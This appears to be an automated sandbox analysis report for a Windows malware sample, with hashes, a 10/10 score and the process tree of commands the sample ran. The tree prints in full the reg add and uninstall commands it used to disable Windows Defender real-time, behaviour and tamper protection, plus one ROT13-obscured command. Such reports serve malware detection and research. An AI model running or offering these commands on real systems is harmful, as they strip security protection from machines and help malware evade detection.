Analysis
-
max time kernel
91s -
max time network
111s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
24-11-2020 12:48
General
-
Target
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe
-
Size
67KB
-
MD5
e3bc953a18fe466cb008184a45c6c858
-
SHA1
bcf4ffa92efac170177e5b8f9199bd8cf8c8d380
-
SHA256
20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b
-
SHA512
f0fd176cce8de8766f34b7d94e428173bdf83fa038611573aabb97dc78c01db3231aadd6fb1e8f0ebea1028238ded4eb8394db307f54fd9bb9eac8443936dc97
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Suspicious use of WriteProcessMemory 66 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe"C:\Users\Admin\AppData\Local\Temp\20f74016f44481b525fa57d676d52355f86b4f175350eebeb6e9a9215b36b45b.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files(x86)\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Program Files\Microsoft Security Client\Setup.exe" /x /s2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpCloudBlockLevel" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /P "P:\Cebtenz Svyrf\Zvpebfbsg Frphevgl Pyvrag\Frghc.rkr" /k /f2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/60-7-0x0000000000000000-mapping.dmp
-
memory/184-13-0x0000000000000000-mapping.dmp
-
memory/196-12-0x0000000000000000-mapping.dmp
-
memory/204-2-0x0000000000000000-mapping.dmp
-
memory/584-0-0x0000000000000000-mapping.dmp
-
memory/912-11-0x0000000000000000-mapping.dmp
-
memory/940-15-0x0000000000000000-mapping.dmp
-
memory/976-16-0x0000000000000000-mapping.dmp
-
memory/1520-5-0x0000000000000000-mapping.dmp
-
memory/1664-19-0x0000000000000000-mapping.dmp
-
memory/1676-18-0x0000000000000000-mapping.dmp
-
memory/1812-9-0x0000000000000000-mapping.dmp
-
memory/2132-6-0x0000000000000000-mapping.dmp
-
memory/2204-10-0x0000000000000000-mapping.dmp
-
memory/2392-14-0x0000000000000000-mapping.dmp
-
memory/3312-21-0x0000000000000000-mapping.dmp
-
memory/3412-1-0x0000000000000000-mapping.dmp
-
memory/3488-4-0x0000000000000000-mapping.dmp
-
memory/3808-17-0x0000000000000000-mapping.dmp
-
memory/3936-8-0x0000000000000000-mapping.dmp
-
memory/4012-20-0x0000000000000000-mapping.dmp
-
memory/4080-3-0x0000000000000000-mapping.dmp